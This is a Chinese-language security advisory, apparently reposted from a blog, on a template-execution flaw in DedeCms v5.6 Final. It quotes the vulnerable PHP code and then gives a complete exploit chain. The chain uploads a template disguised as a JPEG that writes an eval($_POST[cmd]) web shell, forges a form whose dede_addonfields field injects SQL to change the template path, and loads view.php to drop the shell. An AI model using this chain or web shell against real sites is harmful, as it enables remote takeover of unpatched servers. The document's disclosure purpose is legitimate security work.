DedeCms/织梦cms模板执行漏洞(影响版本v5.6)

影响版本: DEDECMS v5.6 Final 程序介绍: DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,
影响版本: 
DEDECMS v5.6 Final 

程序介绍: 
DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目前已经有超过二十万个站点正在使用DedeCms或居于DedeCms核心,是目前国内应用最广泛的php类CMS系统。 

漏洞分析: 

Dedecms V5.6 Final版本中的各个文件存在一系列问题,经过精心构造的含有恶意代表的模板内容可以通过用户后台的上传附件的功能上传上去,然后通过SQL注入修改附加表的模板路径为我们上传的模板路径,模板解析类:include/inc_archives_view.php没有对模板路径及名称做任何限制,则可以成功执行恶意代码。 

1、member/article_edit.php文件(注入): 
//漏洞在member文件夹下普遍存在,$dede_addonfields是由用户提交的,可以被伪造,伪造成功即可带入sql语句,于是我们可以给附加表的内容进行update赋值。 
PHP Code复制内容到剪贴板
  1. …      
  2. //分析处理附加表数据      
  3.     $inadd_f = '';      
  4.     if(!emptyempty($dede_addonfields))//自己构造$dede_addonfields      
  5.     {      
  6.         $addonfields = explode(';',$dede_addonfields);      
  7.         if(is_array($addonfields))      
  8.         {      
  9.             print_r($addonfields);      
  10.             foreach($addonfields as $v)      
  11.             {      
  12.                 if($v=='')      
  13.                 {      
  14.                     continue;      
  15.                 }      
  16.                 $vs = explode(',',$v);      
  17.                 if(!isset(${$vs[0]}))      
  18.                 {      
  19.                     ${$vs[0]} = '';      
  20.                 }      
  21.                 ${$vs[0]} = GetFieldValueA(${$vs[0]},$vs[1],$aid);      
  22.                 $inadd_f .= ','.$vs[0]." ='".${$vs[0]}."' ";      
  23.                 echo $inadd_f;      
  24.             }      
  25.         }      
  26.     }      
  27. …      
  28. if($addtable!='')      
  29.     {      
  30.         $upQuery = "Update `$addtable` set typeid='$typeid',body='$body'{$inadd_f},userip='$userip' where aid='$aid' ";//执行构造的sql      
  31.         if(!$dsql->ExecuteNoneQuery($upQuery))      
  32.         {      
  33.             ShowMsg("更新附加表 `$addtable`  时出错,请联系管理员!","javascript:;");      
  34.             exit();      
  35.         }      
  36.     }      
  37. …   
2、include/inc_archives_view.php: 
//这是模板处理类,如果附加表的模板路径存在,直接从附加表取值;GetTempletFile获取模板文件的方法就是取的此处的模板路径,从来带进去解析。 
PHP Code复制内容到剪贴板
  1. …      
  2. //issystem==-1 表示单表模型,单表模型不支持redirecturl这类参数,因此限定内容普通模型才进行下面查询      
  3.             if($this->ChannelUnit->ChannelInfos['addtable']!='' && $this->ChannelUnit->ChannelInfos['issystem']!=-1)      
  4.             {      
  5.                 if(is_array($this->addTableRow))      
  6.                 {      
  7.                     $this->Fields['redirecturl'] = $this->addTableRow['redirecturl'];      
  8.                     $this->Fields['templet'] = $this->addTableRow['templet'];//取值      
  9.                     $this->Fields['userip'] = $this->addTableRow['userip'];      
  10.                 }      
  11.                 $this->Fields['templet'] = (emptyempty($this->Fields['templet']) ? '' : trim($this->Fields['templet']));      
  12.                 $this->Fields['redirecturl'] = (emptyempty($this->Fields['redirecturl']) ? '' : trim($this->Fields['redirecturl']));      
  13.                 $this->Fields['userip'] = (emptyempty($this->Fields['userip']) ? '' : trim($this->Fields['userip']));      
  14.             }      
  15.             else      
  16.             {      
  17.                 $this->Fields['templet'] = $this->Fields['redirecturl'] = '';      
  18.             }      
  19. …      
  20.       
  21.     //获得模板文件位置      
  22.     function GetTempletFile()      
  23.     {      
  24.         global $cfg_basedir,$cfg_templets_dir,$cfg_df_style;      
  25.         $cid = $this->ChannelUnit->ChannelInfos['nid'];      
  26.         if(!emptyempty($this->Fields['templet']))      
  27.         {      
  28.             $filetag = MfTemplet($this->Fields['templet']);      
  29.             if( !ereg('/'$filetag) ) $filetag = $GLOBALS['cfg_df_style'].'/'.$filetag;      
  30.         }      
  31.         else      
  32.         {      
  33.             $filetag = MfTemplet($this->TypeLink->TypeInfos["temparticle"]);      
  34.         }      
  35.         $tid = $this->Fields['typeid'];      
  36.         $filetag = str_replace('{cid}'$cid,$filetag);      
  37.         $filetag = str_replace('{tid}'$tid,$filetag);      
  38.         $tmpfile = $cfg_basedir.$cfg_templets_dir.'/'.$filetag;      
  39.         if($cid=='spec')      
  40.         {      
  41.             if( !emptyempty($this->Fields['templet']) )      
  42.             {      
  43.                 $tmpfile = $cfg_basedir.$cfg_templets_dir.'/'.$filetag;      
  44.             }      
  45.             else      
  46.             {      
  47.                 $tmpfile = $cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/article_spec.htm";      
  48.             }      
  49.         }      
  50.         if(!file_exists($tmpfile))      
  51.         {      
  52.             $tmpfile = $cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/".($cid=='spec' ? 'article_spec.htm' : 'article_default.htm');      
  53.         }      
  54.         return $tmpfile;      
  55.     }    
漏洞利用: 

1.上传一个模板文件: 

注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是: 
uploads/userup/2/12OMX04-15A.jpg 

模板内容是(如果限制图片格式,加gif89a): 
{dede:name runphp='yes'} 
$fp = @fopen("1.php", 'a'); 
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n"); 
@fclose($fp); 
{/dede:name} 

2.修改刚刚发表的文章,查看源文件,构造一个表单: 
XML/HTML Code复制内容到剪贴板
  1. <form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data" onsubmit="return checkSubmit();">      
  2. <input type="hidden" name="dopost" value="save" />      
  3. <input type="hidden" name="aid" value="2" />      
  4. <input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />      
  5. <input type="hidden" name="channelid" value="1" />      
  6. <input type="hidden" name="oldlitpic" value="" />      
  7. <input type="hidden" name="sortrank" value="1275972263" />      
  8. <div id="mainCp">      
  9. <h3 class="meTitle"><strong>修改文章</strong></h3>      
  10. <div class="postForm">      
  11. <label>标题:</label>      
  12. <input  name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>      
  13. <label>标签TAG:</label>      
  14. <input name="tags" type="text" id="tags"  value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)      
  15. <label>作者:</label>      
  16. <input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>      
  17. <label>隶属栏目:</label>      
  18. <select name='typeid' size='1'>      
  19. <option value='1' class='option3' selected=''>测试栏目</option>      
  20. </select>            <span style="color:#F00">*</span>(不能选择带颜色的分类)      
  21. <label>我的分类:</label>      
  22. <select name='mtypesid' size='1'>      
  23. <option value='0' selected>请选择分类...</option>      
  24. <option value='1' class='option3' selected>hahahha</option>      
  25. </select>      
  26. <label>信息摘要:</label>      
  27. <textarea name="description" id="description">1111111</textarea>      
  28. (内容的简要说明)      
  29. <label>缩略图:</label>      
  30. <input name="litpic" type="file" id="litpic" onchange="SeePicNew('divpicview',this);"  maxlength="100" class="intxt"/>      
  31. <input type='text' name='templet'      
  32. value="../ uploads/userup/2/12OMX04-15A.jpg">      
  33. <input type='text' name='dede_addonfields'      
  34. value="templet,htmltext;">(这里构造)      
  35. </div>      
  36. <!-- 表单操作区域 -->      
  37. <h3 class="meTitle">详细内容</h3>      
  38. <div class="contentShow postForm">      
  39. <input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>      
  40. <label>验证码:</label>      
  41. <input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />      
  42. <img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" onclick="this.src=this.src+'?'" />      
  43. <button class="button2" type="submit">提交</button>      
  44. <button class="button2 ml10" type="reset" onclick="location.reload();">重置</button>      
  45. </div>      
  46. </div>      
  47. </form>   
提交,提示修改成功,则我们已经成功修改模板路径。 

3.访问修改的文章: 

假设刚刚修改的文章的aid为2,则我们只需要访问: 
http://127.0.0.1/dede/plus/view.php?aid=2 
即可以在plus目录下生成小马:1.php 

解决方案: 
厂商补丁: 
DEDECMS 
------------ 
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dedecms.com/ 

信息来源: oldjun's Blog

本站部分内容来源互联网,如果有图片或者内容侵犯您的权益请联系我们删除!

相关文档推荐

dede织梦cms系统的程序存在漏洞,黑客攻击方法层出不穷,导致网站经常被黑,被百度安全中心等拦截,影响排名和流量,让站长非常头疼,下面总结一些防止dede织梦cms系统被攻击设置的方法,可有效的防止织梦系统被挂马,仅供各位站长参考。 1.安装时数据库的前
dedecms有很多漏洞都是出自plus文件夹下的文件,网上有很多挂马工具都有自动扫描网站PLUS目录功能用来匹配漏洞文件,因此为了避免被漏洞入侵,我们可以重命名PLUS文件夹,并将里面无用的文件都清理干净,DEDECMS重命名PLUS目录需要改动对应关系,方法如下 打
最近很多建站朋友发现织梦DedeCMS安装在阿里云服务器后会在阿里云后台提示有一个dedecms任意文件上传漏洞,引起的文件是织梦安装目录下的/include/dialog/select_soft_post.php文件。 原因是在获取完整文件名的时候没有将会对服务器造成危害的文件格式过滤掉
1. 漏洞描述 Dedecms会员中心注入漏洞 2. 漏洞触发条件 http://127.0.0.1/dedecms5.7/member/reg_new.php?dopost=regbaseamp;step=1amp;mtype=%B8%F6%C8%CBamp;mtype=%B8%F6%C8%CBamp;userid=123asd123amp;uname=12asd13123amp;userpwd=123123amp;userpwdok=
织梦百度快照劫持注入代码防范及修正,很多站长做站的过程中,都碰过百度快照被劫持等问题,明明已经修复模板文件了,还是没有更新回正常的快照,以织梦系统为例, 往往根目录/index.php也被植入恶意代码 比如: ?phpif(strpos($_SERVER[HTTP_USER_AGENT],sp
dedecms的安全问题一直是被广大站长用户诟病的,博客吧也感同身受,稍微不注意安全就很容易被黑,篡改网页、挂黑链等问题一个接着一个,因此对dedecms进行有效的安全设置修改显得极其重要,下面是博客吧在织梦CMS帮助中心摘自的几条dedecms安全设置建议。 数